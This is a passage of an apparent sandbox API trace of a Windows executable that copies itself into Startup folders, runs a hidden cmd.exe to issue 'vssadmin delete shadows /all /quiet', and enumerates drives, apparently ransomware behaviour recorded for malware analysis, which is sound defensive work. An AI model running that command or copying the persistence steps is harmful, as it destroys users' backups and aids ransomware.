0x5a4a30 [0030.816] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a5930 [0030.816] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.816] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a58e0 [0030.816] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.816] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.816] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.816] lstrlenW (lpString="kernel32.dll") returned 12 [0030.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0030.816] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a58e0 | out: hHeap=0x570000) returned 1 [0030.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0030.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0030.819] ReadFile (in: hFile=0xe4, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.830] WriteFile (in: hFile=0xe8, lpBuffer=0x2080020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.832] ReadFile (in: hFile=0xe4, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0030.832] CloseHandle (hObject=0xe8) returned 1 [0030.834] CloseHandle (hObject=0xe4) returned 1 [0030.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.834] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a58e0 [0030.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.834] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a5930 [0030.834] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.834] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.834] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.834] lstrlenW (lpString="kernel32.dll") returned 12 [0030.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0030.834] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a58e0 | out: hHeap=0x570000) returned 1 [0030.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x570000) returned 1 [0030.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5cd438 [0030.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5dd440 [0030.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.839] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a58e0 [0030.839] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a58e0, Size=0x40) returned 0x5a6a38 [0030.839] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6a38, Size=0x80) returned 0x5cb450 [0030.839] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5a7bb0 [0030.839] lstrlenW (lpString="") returned 0 [0030.839] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8c) returned 0x5a7cb8 [0030.839] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0030.839] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x5dd440, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0030.839] RegCloseKey (hKey=0xe4) returned 0x0 [0030.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7cb8 | out: hHeap=0x570000) returned 1 [0030.839] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0030.839] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7bb0 | out: hHeap=0x570000) returned 1 [0030.839] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe", lpDst=0x5cd438, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe") returned 0x48 [0030.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd440 | out: hHeap=0x570000) returned 1 [0030.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cd438 | out: hHeap=0x570000) returned 1 [0030.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x2080020 [0030.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.840] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a58e0 [0030.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.840] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a5930 [0030.840] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.840] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.840] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.840] lstrlenW (lpString="kernel32.dll") returned 12 [0030.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a58e0 | out: hHeap=0x570000) returned 1 [0030.840] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0030.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0030.840] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0030.842] ReadFile (in: hFile=0xe4, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.854] WriteFile (in: hFile=0xe8, lpBuffer=0x2080020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.856] ReadFile (in: hFile=0xe4, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0030.856] CloseHandle (hObject=0xe8) returned 1 [0030.857] CloseHandle (hObject=0xe4) returned 1 [0030.857] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.857] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a5930 [0030.857] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.857] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a58e0 [0030.857] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.857] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.857] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.857] lstrlenW (lpString="kernel32.dll") returned 12 [0030.857] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a58e0 | out: hHeap=0x570000) returned 1 [0030.857] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.857] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0030.857] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x570000) returned 1 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ab428 | out: hHeap=0x570000) returned 1 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb430 | out: hHeap=0x570000) returned 1 [0030.862] lstrlenW (lpString="%windir%\\System32") returned 17 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a69a8 | out: hHeap=0x570000) returned 1 [0030.862] lstrlenW (lpString="%appdata%") returned 9 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584398 | out: hHeap=0x570000) returned 1 [0030.862] lstrlenW (lpString="%sh(Startup)%") returned 13 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584370 | out: hHeap=0x570000) returned 1 [0030.862] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a69f0 | out: hHeap=0x570000) returned 1 [0030.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x584370 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584370, Size=0x40) returned 0x5a69f0 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a69f0, Size=0x80) returned 0x5cb450 [0030.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x584370 [0030.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1fffc) returned 0x5ab428 [0030.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5cd438 [0030.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5dd440 [0030.862] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x584398 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584398, Size=0x40) returned 0x5a69f0 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a69f0, Size=0x80) returned 0x5cb4d8 [0030.862] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb4d8, Size=0x100) returned 0x5a7bb0 [0030.862] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7bb0 | out: hHeap=0x570000) returned 1 [0030.862] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x5cd438, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd440 | out: hHeap=0x570000) returned 1 [0030.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cd438 | out: hHeap=0x570000) returned 1 [0030.863] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0030.863] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0030.863] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0030.863] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0030.863] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0xa9c, dwThreadId=0xaa0)) returned 1 [0031.047] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.047] WriteFile (in: hFile=0xec, lpBuffer=0x5cb450*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x5cb450*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0031.047] CloseHandle (hObject=0xfc) returned 1 [0031.047] CloseHandle (hObject=0xf8) returned 1 [0031.047] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ab428 | out: hHeap=0x570000) returned 1 [0031.047] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.047] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb450 | out: hHeap=0x570000) returned 1 [0031.047] lstrlenW (lpString="%comspec%") returned 9 [0031.047] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584370 | out: hHeap=0x570000) returned 1 [0031.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0031.048] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a4a30 [0031.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x5a4a30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0031.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5847a8 [0031.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x5847a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0031.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a48 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a48, Size=0x20) returned 0x584370 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584370, Size=0x40) returned 0x5a69f0 [0031.049] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0031.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xd0) returned 0x5a7c28 [0031.049] GetLogicalDrives () returned 0x4 [0031.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10014) returned 0x5ab428 [0031.049] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a48 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a48, Size=0x20) returned 0x584370 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584370, Size=0x40) returned 0x5a6a80 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6a80, Size=0x80) returned 0x5cb450 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5a9198 [0031.049] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x200) returned 0x5a9198 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x400) returned 0x5a9198 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x800) returned 0x5a97b0 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a97b0, Size=0x1000) returned 0x5bb448 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x5cd438 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a48 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a4b20 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x584750 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a4b38 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x584760 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4b50 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584760, Size=0x8) returned 0x584760 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4b68 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584760, Size=0x10) returned 0x584718 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4b80 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4b98 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584718, Size=0x20) returned 0x5a7ab0 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4bb0 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584760 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a4bc8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a4be0 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a7ab0, Size=0x40) returned 0x5a52d8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a4bf8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a4c10 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a4c28 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a4c40 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4c58 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4c70 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a5320 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4c88 [0031.050] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a52d8, Size=0x80) returned 0x5a9198 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4ca0 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4cb8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4cd0 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4ce8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a97c8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a97e0 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a97f8 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584718 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9810 [0031.050] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9828 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9840 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9858 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9870 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9888 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a98a0 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a98b8 [0031.051] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x100) returned 0x5a9198 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a98d0 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a98e8 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9900 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a9918 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9930 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9948 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584728 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9960 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9978 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9990 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5a7ab0 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a99a8 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a99c0 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a7ac0 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a99d8 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a99f0 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9a08 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9a20 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9a38 [0031.051] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9a50 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5a9a68 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9a80 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a9a98 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9ab0 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9ac8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9ae0 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9af8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a7ad0 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9b10 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9b28 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9b40 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9b58 [0031.052] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x200) returned 0x5a9198 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9b70 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a52d8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9b88 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9bc8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9be0 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9bf8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9c10 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9c28 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, 